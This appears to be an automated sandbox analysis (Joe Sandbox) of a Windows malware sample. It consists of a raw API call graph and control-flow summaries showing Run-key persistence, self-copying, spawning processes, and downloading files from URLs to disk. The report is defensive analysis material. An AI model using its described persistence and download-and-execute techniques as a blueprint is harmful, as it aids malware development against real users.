40be0c HeapReAlloc 6200->6203 6204 40bdfc HeapAlloc 6200->6204 6202 40be3a HeapFree 6201->6202 6205 40bdec 6202->6205 6203->6205 6204->6205 6205->6195 6836 409402 6837 409415 6836->6837 6838 409419 6837->6838 6839 409437 SysFreeString 6837->6839 6839->6838 6840 409883 6841 409890 6840->6841 6842 409655 __VEC_memcpy 6841->6842 6843 4098ad 6842->6843 6844 409655 __VEC_memcpy 6843->6844 6845 4098c7 6843->6845 6844->6845 6206 409445 6208 40945a 6206->6208 6207 40945e 6208->6207 6209 4094a0 SysFreeString SysFreeString 6208->6209 6209->6207 5721 40b346 5766 40d5b0 5721->5766 5724 40b37e 5757 40b3db 5724->5757 5813 40ac20 RegOpenKeyExW 5724->5813 5728 40b394 GetModuleFileNameW 5821 4069fd RegCreateKeyExW 5728->5821 5733 40b3f2 Sleep 5736 40a786 35 API calls 5733->5736 5734 40b3c5 5825 40a786 5734->5825 5735 40b3ca GetLastError 5735->5734 5738 40b407 GetModuleFileNameW 5736->5738 5740 40ac20 4 API calls 5738->5740 5742 40b3d8 5740->5742 5741 40b45c 5744 40ac20 4 API calls 5741->5744 5746 40b426 CopyFileW 5742->5746 5742->5757 5745 40b468 5744->5745 5747 407727 54 API calls 5745->5747 5748 40b43f 5746->5748 5746->5757 5751 40b474 5747->5751 5752 4077f0 CreateProcessW 5748->5752 5749 40b4b9 ExpandEnvironmentStringsW 5749->5757 5750 40b4cf GetModuleFileNameW 5750->5742 5754 40b498 GetLastError 5751->5754 5755 40b47a 5751->5755 5756 40b44b 5752->5756 5759 40b4a3 5754->5759 5758 4077f0 CreateProcessW 5755->5758 5760 40b44c ExitProcess 5756->5760 5757->5733 5757->5741 5757->5749 5757->5750 5757->5760 5761 40b4fe GetLastError 5757->5761 5768 40b2ce OleInitialize 5757->5768 5777 40aafd 5757->5777 5786 40ab7c GetModuleFileNameW CharLowerW 5757->5786 5791 40abd9 5757->5791 5797 407727 5757->5797 5810 4077f0 5757->5810 5762 40b486 5758->5762 5763 40a786 35 API calls 5759->5763 5764 40a786 35 API calls 5761->5764 5762->5760 5765 40b48b GetLastError 5762->5765 5763->5756 5764->5742 5765->5759 5767 40b353 GetModuleFileNameW 5766->5767 5767->5724 5770 40b2e2 5768->5770 5772 40b325 
InternetCloseHandle 5770->5772 5841 407552 5770->5841 5844 407362 CreateWaitableTimerW GetLocalTime GetLocalTime GetTimeZoneInformation 5770->5844 5849 40ac93 5770->5849 5866 40b096 5770->5866 5902 40a6c9 5772->5902 5778 40d5b0 5777->5778 5779 40ab0a GetCommandLineW 5778->5779 5780 40ab1a 5779->5780 5781 40ac20 4 API calls 5780->5781 5784 40ab1f 5780->5784 5782 40ab30 5781->5782 5783 40ab35 GetModuleFileNameW CharLowerW CharLowerW 5782->5783 5782->5784 5785 40ab73 5783->5785 5784->5757 5785->5784 5787 40abb6 5786->5787 5788 40abc0 GetCommandLineW 5787->5788 5789 40abbb 5787->5789 5790 40abd0 5788->5790 5789->5757 5790->5757 5792 40ac20 4 API calls 5791->5792 5793 40abf2 5792->5793 5794 40abf7 FindFirstFileW 5793->5794 5795 40ac1a 5793->5795 5794->5795 5796 40ac0e FindClose 5794->5796 5795->5757 5796->5795 5798 40d5b0 5797->5798 5799 407731 GetModuleFileNameW 5798->5799 5800 407753 5799->5800 5804 40776d 5799->5804 5801 4075d4 15 API calls 5800->5801 5805 407764 5801->5805 5802 407774 ExpandEnvironmentStringsW 6111 4075d4 CreateFileW 5802->6111 5804->5802 5804->5805 5806 4077a7 GetLastError 5804->5806 5807 4077bc GetLastError 5804->5807 5805->5757 5808 4077ca 5806->5808 5807->5808 5808->5804 5809 40a786 35 API calls 5808->5809 5809->5808 6121 40d530 5810->6121 5812 407805 CreateProcessW 5812->5757 5814 40ac60 RegOpenKeyExW 5813->5814 5815 40ac4a 5813->5815 5816 40ac78 5814->5816 5817 40ac7c 5814->5817 6123 4069c0 RegQueryValueExW RegCloseKey 5815->6123 5816->5728 5816->5757 6124 4069c0 RegQueryValueExW RegCloseKey 5817->6124 5820 40ac5a 5820->5814 5820->5816 5822 406a2c 5821->5822 5823 406a30 5821->5823 5822->5734 5822->5735 5824 406a39 RegSetValueExW RegCloseKey 5823->5824 5824->5822 5827 40a79c 5825->5827 5829 40a7b3 5825->5829 5826 406d14 2 API calls 5826->5827 5827->5826 5828 40a79e Sleep 5827->5828 5827->5829 5828->5827 5830 406cb5 GetVersionExW 5829->5830 5831 40a83f 5830->5831 5832 4078cb 12 API calls 5831->5832 5833 40a873 5832->5833 5834 40a718 5 API calls 
5833->5834 5836 40a87b 5834->5836 5835 40a744 5 API calls 5835->5836 5836->5835 5837 40a894 Sleep 5836->5837 5838 406e69 22 API calls 5836->5838 5839 40a8c7 Sleep 5836->5839 5840 40a8e1 GetProcessHeap HeapFree 5836->5840 5837->5836 5838->5836 5839->5836 5840->5742 5906 40584d 5841->5906 5843 407557 Sleep 5843->5770 5846 4073dd SystemTimeToFileTime SystemTimeToFileTime 5844->5846 5847 407432 5846->5847 5848 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5847->5848 5848->5770 5907 406d14 InternetAttemptConnect 5849->5907 5851 40aca4 5852 40aca9 Sleep 5851->5852 5853 40acbd 5851->5853 5854 406d14 2 API calls 5852->5854 5910 4078cb 5853->5910 5854->5851 5856 40acd4 5917 406cb5 GetVersionExW 5856->5917 5858 40ad09 5919 40a718 5858->5919 5861 40ad71 Sleep 5863 40ad4c 5861->5863 5863->5861 5864 40ad9f Sleep 5863->5864 5865 40adbc 5863->5865 5923 40a744 5863->5923 5927 406e69 5863->5927 5864->5863 5865->5770 5867 40b0a3 5866->5867 5868 40b0bd 5867->5868 5869 40b0cf 5867->5869 5896 40b0ae 5867->5896 6031 407995 5868->6031 6038 407951 5869->6038 5872 40b0cd 5876 40b0fb GetModuleFileNameW 5872->5876 5888 40b155 5872->5888 5873 40b177 InternetClearAllPerSiteCookieDecisions 5875 40b17d 5873->5875 5874 40b168 InternetSetPerSiteCookieDecisionW 5874->5875 6059 4032b8 5875->6059 5878 40b116 GetCurrentDirectoryW 5876->5878 5884 40b10d 5876->5884 5878->5884 5880 40b186 GetLastError 5882 40a786 35 API calls 5880->5882 5881 40b196 5883 40b1b0 CreateThread 5881->5883 5885 40b1e1 5881->5885 5882->5881 5883->5881 6043 40253c 5884->6043 5887 40b221 5885->5887 5889 40a786 35 API calls 5885->5889 5890 40b228 CloseHandle 5887->5890 5891 40b23d 5887->5891 5888->5873 5888->5874 5888->5896 5892 40b1f7 5889->5892 5890->5890 5890->5891 5893 40a6c9 InternetCloseHandle 5891->5893 5892->5887 5894 40b212 WaitForMultipleObjects 5892->5894 5895 40b242 InternetClearAllPerSiteCookieDecisions 5893->5895 5894->5887 5895->5896 5897 40b24d 5895->5897 5896->5770 5897->5896 5898 40b261 
GetModuleFileNameW 5897->5898 5899 40b27c GetCurrentDirectoryW 5898->5899 5900 40b273 5898->5900 5899->5900 5901 40253c 50 API calls 5900->5901 5901->5896 5905 40a6cf 5902->5905 5903 40a6fc InternetCloseHandle 5903->5905 5904 40a716 ExitProcess 5905->5903 5905->5904 5906->5843 5908 406d22 5907->5908 5909 406d26 InternetOpenW 5907->5909 5908->5851 5909->5851 5939 407e2b 5910->5939 5912 4078dd 5913 407900 5912->5913 5945 40782a GetModuleFileNameW CreateFileW 5912->5945 5913->5856 5915 4078ec 5915->5913 5949 407d61 5915->5949 5918 406cf6 5917->5918 5918->5858 5920 40a722 5919->5920 5921 40a739 5920->5921 5961 4079ff 5920->5961 5921->5863 5924 40a75d 5923->5924 5925 4079ff 5 API calls 5924->5925 5926 40a76e 5924->5926 5925->5926 5926->5863 5928 40d5b0 5927->5928 5929 406e76 GetTickCount 5928->5929 5930 406e92 5929->5930 5967 407b4e 5930->5967 5932 406f49 5976 409c99 5932->5976 5936 407017 5936->5863 5937 406ff4 5937->5936 5992 407a3c 5937->5992 5940 407e3d 5939->5940 5941 407e4e SetFilePointer ReadFile 5939->5941 5955 407cd7 5940->5955 5944 407e7e 5941->5944 5943 407e44 5943->5941 5943->5944 5944->5912 5946 407871 GetFileTime CloseHandle 5945->5946 5947 407888 GetTickCount 5945->5947 5948 407893 5946->5948 5947->5948 5948->5915 5950 407d70 5949->5950 5953 407d77 5949->5953 5951 407cd7 3 API calls 5950->5951 5951->5953 5952 407d81 5952->5913 5953->5952 5954 407dfa SetFilePointer WriteFile 5953->5954 5954->5913 5956 40d5b0 5955->5956 5957 407ce4 GetModuleFileNameW 5956->5957 5958 407d00 5957->5958 5959 407d0d GetCurrentDirectoryW 5957->5959 5960 407d36 CreateFileW 5958->5960 5959->5958 5960->5943 5964 407908 5961->5964 5963 407a05 5963->5920 5965 407e2b 5 API calls 5964->5965 5966 407919 5965->5966 5966->5963 6002 407267 5967->6002 5969 407b63 5970 407e2b 5 API calls 5969->5970 5971 407b83 5969->5971 5970->5971 5971->5971 5972 407c6b 5971->5972 6007 40bcb4 5971->6007 6017 40bd55 5972->6017 5977 409ca6 5976->5977 5978 409cbb InternetOpenUrlW 5977->5978 5979 409cdf 
GetProcessHeap HeapAlloc 5978->5979 5980 406fe2 5978->5980 5979->5980 5981 409d5b InternetReadFile 5979->5981 5980->5936 5988 406e00 5980->5988 5982 409d79 GetProcessHeap HeapAlloc 5981->5982 5984 409d0b 5981->5984 5983 409d92 GetProcessHeap HeapFree 5982->5983 5983->5980 5984->5981 5984->5982 5986 409d1f GetProcessHeap HeapReAlloc 5984->5986 5987 40c5d0 __VEC_memcpy 5984->5987 5986->5980 5986->5984 5987->5984 5989 406e12 5988->5989 5990 40c5d0 __VEC_memcpy 5989->5990 5991 406e21 5990->5991 5991->5937 5993 407a4f 5992->5993 5994 40c5d0 __VEC_memcpy 5993->5994 6001 407b42 5993->6001 5995 407a7d 5994->5995 5996 407267 3 API calls 5995->5996 5995->6001 5997 407b17 5996->5997 5998 407267 3 API calls 5997->5998 5999 407b20 5998->5999 6000 407d61 5 API calls 5999->6000 6000->6001 6001->5936 6003 407284 6002->6003 6004 407278 GetSystemTime 6002->6004 6005 40728b SystemTimeToFileTime SystemTimeToFileTime 6003->6005 6004->6005 6006 4072e8 __aulldiv 6005->6006 6006->5969 6011 40bcd3 6007->6011 6008 40bd17 6009 40bd3a 6008->6009 6012 40b51c __VEC_memcpy 6008->6012 6010 40bd4d 6009->6010 6013 40c5d0 __VEC_memcpy 6009->6013 6010->5972 6011->6008 6023 40c5d0 6011->6023 6012->6008 6013->6010 6018 40bd5c 6017->6018 6018->6018 6019 40bd9e 6018->6019 6020 40bcb4 __VEC_memcpy 6018->6020 6021 40bcb4 __VEC_memcpy 6019->6021 6020->6019 6022 407c7c 6021->6022 6022->5932 6024 40c5e8 6023->6024 6025 40c60f __VEC_memcpy 6024->6025 6026 40bcf9 6024->6026 6025->6026 6026->6010 6027 40b51c 6026->6027 6028 40b543 6027->6028 6030 40b552 6027->6030 6029 40c5d0 __VEC_memcpy 6028->6029 6029->6030 6030->6008 6037 4079a2 6031->6037 6032 4079f1 6033 407951 36 API calls 6032->6033 6035 4079fc 6033->6035 6034 407e2b 5 API calls 6034->6037 6035->5872 6037->6032 6037->6034 6066 40791c 6037->6066 6040 407965 6038->6040 6039 407e2b 5 API calls 6039->6040 6040->6039 6041 40798e 6040->6041 6042 40791c 36 API calls 6040->6042 6041->5872 6042->6040 6045 402549 6043->6045 6044 402572 6046 402584 DeleteFileW 
6044->6046 6048 40a786 35 API calls 6044->6048 6045->6044 6047 406d14 2 API calls 6045->6047 6052 402561 Sleep 6045->6052 6049 402594 6046->6049 6053 4025ba 6046->6053 6047->6045 6050 402581 6048->6050 6054 4025c1 6049->6054 6055 4025ad Sleep 6049->6055 6072 407036 DeleteFileW CreateFileW 6049->6072 6050->6046 6052->6045 6053->5888 6056 40a786 35 API calls 6054->6056 6058 4025d0 _memset 6054->6058 6055->6049 6055->6053 6056->6058 6057 402630 CreateProcessW 6057->6053 6058->6057 6083 406a68 RegOpenKeyExW 6059->6083 6064 403351 GetProcAddress GetProcAddress GetProcAddress 6065 403386 6064->6065 6065->5880 6065->5881 6067 407d61 5 API calls 6066->6067 6068 407930 6067->6068 6069 407939 GetLastError 6068->6069 6070 407949 6068->6070 6071 40a786 35 API calls 6069->6071 6070->6037 6071->6070 6073 407078 GetLastError 6072->6073 6078 40706b 6072->6078 6074 407095 InternetOpenUrlW 6073->6074 6075 407089 SetEndOfFile 6073->6075 6076 4070c6 InternetQueryDataAvailable 6074->6076 6077 4070b8 CloseHandle 6074->6077 6075->6074 6079 407119 InternetReadFile 6076->6079 6077->6078 6078->6049 6080 407123 CloseHandle InternetCloseHandle 6079->6080 6081 4070ed 6079->6081 6080->6078 6081->6080 6082 4070f2 WriteFile 6081->6082 6082->6079 6084 406a9a 6083->6084 6088 4032c4 6083->6088 6107 4069c0 RegQueryValueExW RegCloseKey 6084->6107 6086 406aaa 6087 4069fd 3 API calls 6086->6087 6086->6088 6087->6088 6089 406adf 6088->6089 6090 406aec 6089->6090 6091 406b11 RegOpenKeyExW 6090->6091 6092 406b34 6091->6092 6100 4032ce 6 API calls 6091->6100 6108 4069c0 RegQueryValueExW RegCloseKey 6092->6108 6094 406b49 6095 406b78 RegOpenKeyExW 6094->6095 6094->6100 6096 406b96 6095->6096 6097 406ba6 6095->6097 6109 4069c0 RegQueryValueExW RegCloseKey 6096->6109 6099 4069fd 3 API calls 6097->6099 6101 406bc3 6097->6101 6099->6101 6100->6064 6100->6065 6101->6100 6102 406c03 RegOpenKeyExW 6101->6102 6103 406c21 6102->6103 6106 406c31 6102->6106 6110 4069c0 RegQueryValueExW RegCloseKey 6103->6110 6105 
4069fd 3 API calls 6105->6100 6106->6100 6106->6105 6107->6086 6108->6094 6109->6097 6110->6106 6112 40760a CreateFileW 6111->6112 6113 407622 6111->6113 6112->6113 6114 40762a GetFileSize GetProcessHeap RtlAllocateHeap 6112->6114 6113->5804 6114->6113 6115 407650 ReadFile 6114->6115 6115->6113 6116 40766a 6115->6116 6116->6113 6117 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6116->6117 6120 40584d 6117->6120 6119 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6119->6113 6120->6119 6122 40d53c __VEC_memzero 6121->6122 6122->5812 6123->5820 6124->5816 6846 401006 6847 40101f 6846->6847 6848 407499 5 API calls 6847->6848 6851 4010c1 6847->6851 6849 4010ce 6848->6849 6850 407552 Sleep 6849->6850 6849->6851 6850->6851 6852 409a07 6855 409a14 6852->6855 6853 409a92 6854 409a6d SysAllocString 6854->6853 6855->6853 6855->6854 6856 403287 6857 403292 6856->6857 6858 4032aa 6856->6858 6857->6858 6860 408604 RegOpenKeyExW 6857->6860 6861 408632 6860->6861 6862 40864a GetLastError 6860->6862 6870 4069c0 RegQueryValueExW RegCloseKey 6861->6870 6864 408654 6862->6864 6865 408658 6862->6865 6864->6857 6867 408682 DeleteFileW 6865->6867 6868 40866a 6865->6868 6866 408646 6866->6862 6867->6864 6869 4069fd 3 API calls 6868->6869 6869->6864 6870->6866 6880 40ce08 6881 40ce1a 6880->6881 6883 40ce28 @_EH4_CallFilterFunc@8 6880->6883 6882 40cd66 __except_handler4 5 API calls 6881->6882 6882->6883 6884 409909 6885 409916 6884->6885 6892 409723 6885->6892 6887 409a02 6888 409934 6888->6887 6889 409723 __VEC_memcpy 6888->6889 6890 4099d5 6889->6890 6890->6887 6891 4099de SysAllocString SysAllocString 6890->6891 6891->6887 6893 409733 6892->6893 6894 40c5d0 __VEC_memcpy 6893->6894 6895 409772 6893->6895 6894->6895 6895->6888 6210 4047cc 6211 40821c PathCombineW 6210->6211 6212 4047f1 6211->6212 6213 404800 6212->6213 6214 404843 6212->6214 6218 40483b 6212->6218 6217 408248 8 API calls 6213->6217 6234 4083c4 CreateFileW 6214->6234 6217->6218 6221 404a61 6223 
404a79 6221->6223 6224 404a69 VirtualFree 6221->6224 6222 40487b HeapAlloc 6231 404896 6222->6231 6223->6218 6225 404a7f CloseHandle 6223->6225 6224->6223 6225->6218 6226 404a4a 6227 40be3a HeapFree 6226->6227 6228 404a53 6227->6228 6255 40be54 6228->6255 6230 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6230->6231 6231->6226 6231->6230 6233 40c00b 3 API calls 6231->6233 6250 40c3f9 6231->6250 6233->6231 6235 4083ea GetFileSizeEx 6234->6235 6236 404854 6234->6236 6237 4083f9 6235->6237 6238 40844f CloseHandle 6235->6238 6236->6218 6243 40c290 6236->6243 6237->6236 6237->6238 6239 40840e VirtualAlloc 6237->6239 6238->6236 6239->6238 6240 408423 ReadFile 6239->6240 6241 408441 VirtualFree 6240->6241 6242 408439 6240->6242 6241->6238 6242->6236 6242->6241 6244 40486e 6243->6244 6249 40c2b6 6243->6249 6244->6221 6244->6222 6245 40bde1 3 API calls 6245->6249 6246 40c340 6247 40be54 HeapFree 6246->6247 6247->6244 6249->6244 6249->6245 6249->6246 6261 40c05c 6249->6261 6251 40c402 6250->6251 6252 40c407 6250->6252 6251->6231 6253 40c412 wvnsprintfW 6252->6253 6254 40c42e 6253->6254 6254->6231 6257 40be5b 6255->6257 6260 40be73 6255->6260 6256 40be3a HeapFree 6256->6257 6257->6256 6258 40be6d 6257->6258 6257->6260 6259 40be3a HeapFree 6258->6259 6259->6260 6260->6221 6262 40c066 6261->6262 6263 40c06a 6261->6263 6262->6249 6263->6262 6266 40be27 HeapAlloc 6263->6266 6265 40c086 6265->6249 6266->6265 6896 40978d 6897 40979a 6896->6897 6898 409655 __VEC_memcpy 6897->6898 6899 4097b3 6898->6899 6900 4097ba 6899->6900 6901 409655 __VEC_memcpy 6899->6901 6902 4097d6 6901->6902 6903 409805 6902->6903 6904 4097df SysAllocString SysAllocString 6902->6904 6904->6903 6905 402d0e 6906 40267a 122 API calls 6905->6906 6907 402d32 6906->6907 6910 409c6f 6907->6910 6911 402d3a 6910->6911 6912 409c7a SysFreeString 6910->6912 6912->6911 6912->6912 6913 40350f 6914 40821c PathCombineW 6913->6914 6915 403531 6914->6915 6916 40354d 6915->6916 6917 403540 6915->6917 6918 403553 HeapAlloc 
6915->6918 6919 4034a8 8 API calls 6917->6919 6918->6916 6920 403576 GetPrivateProfileStringW 6918->6920 6919->6916 6921 403594 6920->6921 6922 40372c 6920->6922 6921->6922 6924 4035a8 HeapAlloc 6921->6924 6923 40be3a HeapFree 6922->6923 6923->6916 6924->6922 6931 4035c5 6924->6931 6925 403627 GetPrivateProfileStringW 6926 403643 GetPrivateProfileIntW 6925->6926 6925->6931 6927 403669 GetPrivateProfileStringW 6926->6927 6926->6931 6928 40368b GetPrivateProfileStringW 6927->6928 6927->6931 6928->6931 6929 403723 6930 40be3a HeapFree 6929->6930 6930->6922 6931->6925 6931->6929 6932 40c3f9 wvnsprintfW 6931->6932 6933 40c00b 3 API calls 6931->6933 6932->6931 6933->6931 6267 40cbd0 6268 40cc08 6267->6268 6269 40cbfb 6267->6269 6271 40cd66 __except_handler4 5 API calls 6268->6271 6285 40cd66 6269->6285 6274 40cc18 __except_handler4 6271->6274 6272 40cc9f 6273 40cc74 __except_handler4 6273->6272 6275 40cc8f 6273->6275 6276 40cd66 __except_handler4 5 API calls 6273->6276 6274->6272 6274->6273 6279 40ccb5 _CallDestructExceptionObject 6274->6279 6277 40cd66 __except_handler4 5 API calls 6275->6277 6276->6275 6277->6272 6293 40ce9a RtlUnwind 6279->6293 6280 40ccf4 __except_handler4 6281 40cd2b 6280->6281 6282 40cd66 __except_handler4 5 API calls 6280->6282 6283 40cd66 __except_handler4 5 API calls 6281->6283 6282->6281 6284 40cd3b __except_handler3 6283->6284 6286 40cd70 IsDebuggerPresent 6285->6286 6287 40cd6e 6285->6287 6295 40d247 6286->6295 6287->6268 6290 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6291 40d0f3 __except_handler4 6290->6291 6292 40d0fb GetCurrentProcess TerminateProcess 6290->6292 6291->6292 6292->6268 6294 40ceaf 6293->6294 6294->6280 6295->6290 6940 40d990 6941 40d993 VirtualQuery 6940->6941 6943 40d9b2 6941->6943 6945 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6941->6945 6944 40d9cc GetVersionExA 6943->6944 6943->6945 6944->6945 6296 401652 6297 401665 6296->6297 6301 4016f6 6297->6301 6302 407499 
GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6297->6302 6299 4016da 6300 407552 Sleep 6299->6300 6299->6301 6300->6301 6303 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6302->6303 6303->6299 6946 402214 6949 402233 6946->6949 6947 402319 6948 402386 6947->6948 6954 401c41 6947->6954 6949->6947 6951 408091 3 API calls 6949->6951 6951->6947 6952 402478 6952->6948 6953 408091 3 API calls 6952->6953 6953->6948 6959 401c4e 6954->6959 6955 401e07 6958 407267 3 API calls 6955->6958 6960 401d15 6955->6960 6956 401d0e 6957 407267 3 API calls 6956->6957 6957->6960 6958->6960 6959->6955 6959->6956 6960->6952 6304 402dd5 6307 40267a 6304->6307 6313 40268a 6307->6313 6308 4027dd 6309 4026ee GetTickCount 6309->6313 6312 407552 Sleep 6312->6313 6313->6308 6313->6309 6313->6312 6314 4027e6 OleInitialize 6313->6314 6375 40a8f9 6313->6375 6392 40a469 6314->6392 6316 402806 6322 40280b 6316->6322 6399 40a345 6316->6399 6319 402851 6405 40a65e 6319->6405 6320 40285f 6323 40286e 6320->6323 6408 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6320->6408 6322->6313 6410 409f2b 6323->6410 6326 402884 6327 4028b4 6326->6327 6332 402943 6326->6332 6418 408f26 6326->6418 6330 408f26 10 API calls 6327->6330 6327->6332 6329 402c20 6331 40a65e Sleep 6329->6331 6333 4028ea 6330->6333 6331->6322 6332->6329 6337 4029aa 6332->6337 6443 4089fd 6332->6443 6334 4028f1 6333->6334 6335 402956 6333->6335 6342 402904 SysAllocString 6334->6342 6338 40a65e Sleep 6335->6338 6340 4029e6 6337->6340 6343 4089fd 5 API calls 6337->6343 6338->6332 6339 402a3b 6346 408f26 10 API calls 6339->6346 6348 402a6f 6339->6348 6340->6339 6452 40920a 6340->6452 6345 402927 SysFreeString 6342->6345 6350 40293a 6342->6350 6343->6340 6344 402a17 6457 409c49 6344->6457 6345->6345 6345->6350 6351 402a62 SysAllocString 6346->6351 6347 402aa2 6353 402ad1 6347->6353 6358 408f26 10 API calls 6347->6358 6348->6347 6352 408f26 10 API calls 6348->6352 6350->6332 6437 
4091bd 6350->6437 6351->6348 6357 402a95 SysAllocString 6352->6357 6354 402b04 6353->6354 6359 408f26 10 API calls 6353->6359 6360 40a65e Sleep 6354->6360 6357->6347 6361 402ac4 SysAllocString 6358->6361 6362 402af7 SysAllocString 6359->6362 6363 402b0e 6360->6363 6361->6353 6362->6354 6364 409c49 SysAllocString 6363->6364 6365 402b6b 6363->6365 6364->6365 6366 402b83 6365->6366 6367 409c49 SysAllocString 6365->6367 6368 402be3 6366->6368 6369 402bea 6366->6369 6367->6366 6460 408825 6368->6460 6484 408692 6369->6484 6372 402be8 SysFreeString 6372->6329 6374 402c11 SysFreeString 6372->6374 6374->6329 6374->6374 6376 40a906 6375->6376 6377 406d14 2 API calls 6376->6377 6378 40a917 Sleep 6376->6378 6379 40a92c 6376->6379 6377->6376 6378->6376 6380 4078cb 12 API calls 6379->6380 6381 40aa37 6380->6381 6382 406cb5 GetVersionExW 6381->6382 6383 40aa52 6382->6383 6384 40a718 5 API calls 6383->6384 6385 40aa7e 6384->6385 6386 40a744 5 API calls 6385->6386 6388 40aa91 6386->6388 6387 406e69 22 API calls 6387->6388 6388->6387 6389 40aabc Sleep 6388->6389 6390 40aae5 GetProcessHeap HeapFree 6388->6390 6391 40a744 5 API calls 6388->6391 6389->6388 6390->6313 6391->6388 6393 40a479 6392->6393 6395 40a4ef 6393->6395 6396 40a4dc 6393->6396 6500 40a156 6393->6500 6395->6316 6396->6395 6397 40a530 InternetOpenW 6396->6397 6397->6395 6398 40a545 InternetSetOptionW 6397->6398 6398->6395 6400 40a352 6399->6400 6402 40284a 6400->6402 6403 40a442 6400->6403 6517 40a245 6400->6517 6402->6319 6402->6320 6403->6402 6525 40a2d9 6403->6525 6407 40a662 Sleep 6405->6407 6407->6322 6409 40735e __aulldiv 6408->6409 6409->6323 6411 409f37 6410->6411 6412 409f40 GetTickCount 6411->6412 6413 409f5f GetTickCount 6412->6413 6414 409f67 PeekMessageW 6413->6414 6417 409fa7 6413->6417 6415 409f88 Sleep 6414->6415 6416 409f7c DispatchMessageW 6414->6416 6415->6413 6416->6414 6417->6326 6541 40a582 6418->6541 6420 408f35 6421 408f78 SysFreeString 6420->6421 6428 408f96 6420->6428 6429 408f3e 6420->6429 
6421->6421 6421->6428 6422 409039 6423 409040 6422->6423 6424 409043 SysFreeString 6422->6424 6425 409058 6422->6425 6423->6424 6424->6429 6426 409091 GetTickCount 6425->6426 6427 40905f 6425->6427 6436 4090ae 6426->6436 6430 40908f 6427->6430 6431 40906a SysAllocString 6427->6431 6428->6422 6432 409025 SysFreeString 6428->6432 6429->6327 6433 409108 SysFreeString 6430->6433 6434 40911b SysFreeString 6430->6434 6431->6427 6432->6428 6433->6433 6433->6434 6434->6429 6435 4090c7 SysAllocString 6435->6436 6436->6430 6436->6435 6438 40a582 2 API calls 6437->6438 6439 4091cc 6438->6439 6440 4091d2 6439->6440 6549 409655 6439->6549 6440->6332 6444 408a1a 6443->6444 6445 408bc4 6444->6445 6447 408c0d VariantClear 6444->6447 6448 408a1e 6444->6448 6449 408b99 SysFreeString 6444->6449 6450 408bab VariantClear 6444->6450 6451 408b6b SysFreeString 6444->6451 6446 408c1c GetTickCount 6445->6446 6445->6448 6446->6448 6447->6448 6448->6337 6449->6444 6450->6444 6450->6445 6451->6444 6456 409217 6452->6456 6453 409295 SysAllocString 6453->6344 6456->6453 6553 408091 6456->6553 6458 409c54 SysAllocString 6457->6458 6459 402a27 SysAllocString SysFreeString 6457->6459 6458->6459 6459->6339 6461 408832 6460->6461 6462 40a469 14 API calls 6461->6462 6464 408857 6462->6464 6463 40885c 6463->6372 6464->6463 6465 40a345 22 API calls 6464->6465 6473 408883 6465->6473 6466 40888a 6468 40a65e Sleep 6466->6468 6467 4088eb 6469 409f2b 5 API calls 6467->6469 6468->6463 6470 4088f6 6469->6470 6471 4089fd 5 API calls 6470->6471 6472 408911 6471->6472 6472->6466 6481 40891f 6472->6481 6473->6466 6473->6467 6561 409301 6473->6561 6475 4089f0 SysFreeString 6477 40a65e Sleep 6477->6481 6478 40a469 14 API calls 6478->6481 6479 40a345 22 API calls 6479->6481 6480 409f2b 5 API calls 6480->6481 6481->6475 6481->6477 6481->6478 6481->6479 6481->6480 6482 409301 7 API calls 6481->6482 6483 4089cd SysFreeString SysFreeString 6482->6483 6483->6481 6485 40a469 14 API calls 6484->6485 6487 4086b1 6485->6487 

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
